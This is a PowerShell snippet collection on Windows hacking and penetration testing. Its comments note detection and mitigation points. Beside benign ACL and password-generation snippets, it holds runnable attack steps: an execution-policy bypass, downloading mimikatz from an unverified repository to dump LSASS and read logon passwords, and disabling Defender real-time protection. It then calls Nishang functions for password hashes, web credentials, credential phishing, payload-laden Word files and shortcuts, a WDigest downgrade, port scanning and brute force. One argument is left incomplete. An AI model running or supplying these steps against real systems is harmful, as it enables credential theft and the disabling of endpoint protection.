Wissen/X11_Technology_HackingSecurity.ps1

# ? TITEL Hacking / Penetration-Testing
# ? DESCRIPTION mittels PowerShell Windows auf Schwachstellen prüfen
# ? TAGS ACL SecureString Password Penetration
# ? VERSION 2019.11.08

# ? Bypass the effective execution policy
# The script text is piped into a new powershell.exe over stdin (the trailing '-' means
# "read commands from standard input"). The child never loads a .ps1 file, so the
# execution-policy check for script files does not apply to it.
# Execution policy is a safety feature, not a security boundary. Controls that do
# restrict this are application control (AppLocker / WDAC, which puts PowerShell into
# Constrained Language Mode). Script Block Logging (event 4104) and AMSI still see the
# piped content.
Get-Content -Path .\_SCHNIPPSEL.ps1 | powershell.exe -NoProfile -

# ? List NTFS permissions
# Emits the access rules (ACEs) of the Windows directory's DACL, one object per rule.
# For an audit, the entries of interest are write/modify rights granted to non-admin
# principals.
(Get-Acl -Path $env:windir).Access

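# ? Generate a random password
# Get-Random is not documented as cryptographically secure, and 'Get-Random -Count'
# samples WITHOUT replacement, so no character could ever repeat (smaller keyspace).
# This version draws every position independently from the OS CSPRNG.
# Single quotes keep the '$' in the alphabet literal.
$erlaubteZeichen = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!§$%&*~.,-'
$laenge = 10
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
try {
    $puffer = New-Object -TypeName byte[] -ArgumentList 1
    # Largest multiple of the alphabet size that fits into one byte. Bytes at or above
    # this limit are discarded so the modulo below does not favour the first characters.
    $grenze = 256 - (256 % $erlaubteZeichen.Length)
    $passwort = New-Object -TypeName System.Text.StringBuilder
    while ($passwort.Length -lt $laenge) {
        $rng.GetBytes($puffer)
        if ($puffer[0] -lt $grenze) {
            [void]$passwort.Append($erlaubteZeichen[$puffer[0] % $erlaubteZeichen.Length])
        }
    }
    # Emit the password to the pipeline, as the original one-liner did.
    $passwort.ToString()
}
finally {
    $rng.Dispose()
}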

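# ? Decrypt a SecureString
# A SecureString only protects against casual disclosure: any code running as the same
# user can turn it back into plaintext, as shown here.
$cred = Get-Credential -Message "HR Leader" -UserName "mueller"
if ($cred) {
    $cred.UserName
    # SecureStringToBSTR copies the plaintext into an unmanaged BSTR that the garbage
    # collector does not manage. Without ZeroFreeBSTR the buffer leaks and the plaintext
    # stays readable in process memory (and in any crash dump) until the process ends.
    $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password)
    try {
        # PtrToStringBSTR reads the length-prefixed BSTR directly. PtrToStringAuto depends
        # on the platform's default string encoding.
        [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
    }
    finally {
        # Overwrite the buffer with zeros, then release it.
        [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
    }
}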

# ? Does the current user hold administrator rights?
# IsInRole evaluates the token of the current process. Under UAC, a member of the
# Administrators group running non-elevated therefore yields $false.
$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]::new($identity)
$adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator
$principal.IsInRole($adminRole)

#region Read Windows passwords (Mimikatz)
# Lab demonstration of LSASS credential dumping. Points a reviewer or defender should note:
# - The three binaries come from a third-party repository, addressed by branch
#   ('raw/master') and not by commit, with no hash or signature check before execution.
#   Whatever that repository serves at download time is what runs.
# - The TLS setting below enables TLS 1.1 alongside TLS 1.2; TLS 1.1 is deprecated.
# - Out-Minidump is not a built-in cmdlet and is not defined in this file.
# - Detection: process-access events targeting lsass.exe (e.g. Sysmon event ID 10),
#   creation of lsass*.dmp files, AV/EDR detections on the downloaded binaries.
# - Mitigation: LSA protection (RunAsPPL), Credential Guard, and the Defender ASR rule
#   "Block credential stealing from the Windows local security authority subsystem".

Set-Location C:\temp
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Tls11,Tls12'
Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimikatz.exe' -OutFile ".\mimikatz.exe"
Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimilib.dll'  -OutFile ".\mimilib.dll"
Invoke-WebRequest -Uri 'https://github.com/entynetproject/WebBrowserPassView-plugin/raw/master/mimikatz_trunk/x64/mimidrv.sys'  -OutFile ".\mimidrv.sys"
Get-Process lsass | Out-Minidump
Start-Process -FilePath .\mimikatz.exe
# in mimikatz
# sekurlsa::minidump C:\temp\lsass_776.dmp
# sekurlsa::logonPasswords full

#endregion

#region Penetration-Testing-Framework (Nishang)

# Background reading on the Nishang framework. Start-Process on a URL hands it to the
# default browser.
$nishangReferences = @(
    'https://n0where.net/powershell-penetration-testing-framework-nishang'
    'https://serenity-networks.com/hacking-in-windows-using-nishang-with-windows-powershell'
)
foreach ($url in $nishangReferences) {
    Start-Process $url
}

# Download Nishang into C:\temp and load it as a module (lab setup).
Set-Location C:\temp
# Fetches the tip of the master branch. The content is not pinned to a release or commit,
# and no hash is checked before the code is imported below.
Invoke-WebRequest -Uri "https://github.com/samratashok/nishang/archive/master.zip" -OutFile ".\nishang.zip"
Expand-Archive -Path ".\nishang.zip" -DestinationPath "." -Force
Rename-Item -Path .\nishang-master -NewName nishang -Force
# Unblock-File removes the Zone.Identifier (Mark-of-the-Web) stream from every extracted
# file, so nothing downstream treats them as downloaded from the internet.
Get-ChildItem -Path '.\nishang' -Recurse | Unblock-File
# Turns off Microsoft Defender real-time protection for the whole machine. It stays off
# until the matching '-DisableRealtimeMonitoring $false' call in the cleanup lines runs.
# If the session ends before that, the host remains unprotected.
# The call requires elevation and is ignored when Tamper Protection is enabled. Defender
# records the state change (event 5001 in the Windows Defender operational log), which
# is a useful alerting source.
Set-MpPreference -DisableRealtimeMonitoring $true
Import-Module -Name .\nishang 
Get-Command -Module nishang | Out-GridView

# Sample calls into the Nishang module imported above. Apart from Get-ExecutionPolicy and
# Get-Help (built in), these functions come from Nishang; their behaviour is not visible
# in this file, so the groupings below go by name only.
# Defender view: with Script Block Logging enabled, the function definitions are recorded
# (event 4104) when the module is imported, and AMSI-aware AV flags many of them. That
# is why the setup lines disable real-time protection first.

# Local information and credential gathering (by name).
Get-Information
Get-PassHashes
Get-WebCredentials
# Both calls are given a payload string that launches powershell.exe with
# -ExecutionPolicy Bypass.
Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'
Out-Shortcut -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'

Get-ExecutionPolicy -List
ConvertTo-ROT13 -rot13string "hallo köln" 
Show-TargetScreen 127.0.0.1
Speak -Sentence "Ich weiß was du letzten Sommer getan hast"
# Start and end address are identical, so the range covers a single host.
Invoke-PortScan 192.168.103.156 192.168.103.156 -ScanPort
Get-help Get-Wlan-Keys -full
Invoke-CredentialsPhish
Invoke-MimikatzWDigestDowngrade 
# NOTE(review): the address argument below is incomplete as written in the source.
Invoke-BruteForce 127.0.0.

# Cleanup: unload the module, delete the extracted tree and the archive, then switch
# Defender real-time protection back on.
# NOTE(review): the re-enable is the very last statement. If the session is closed or the
# run is interrupted before it, real-time protection stays disabled. Verify afterwards
# with Get-MpComputerStatus (RealTimeProtectionEnabled should be True).
Remove-Module -Name nishang 
Remove-Item -Path .\nishang -Force -Recurse
Remove-Item -Path .\nishang.zip -Force
Set-MpPreference -DisableRealtimeMonitoring $false

#endregion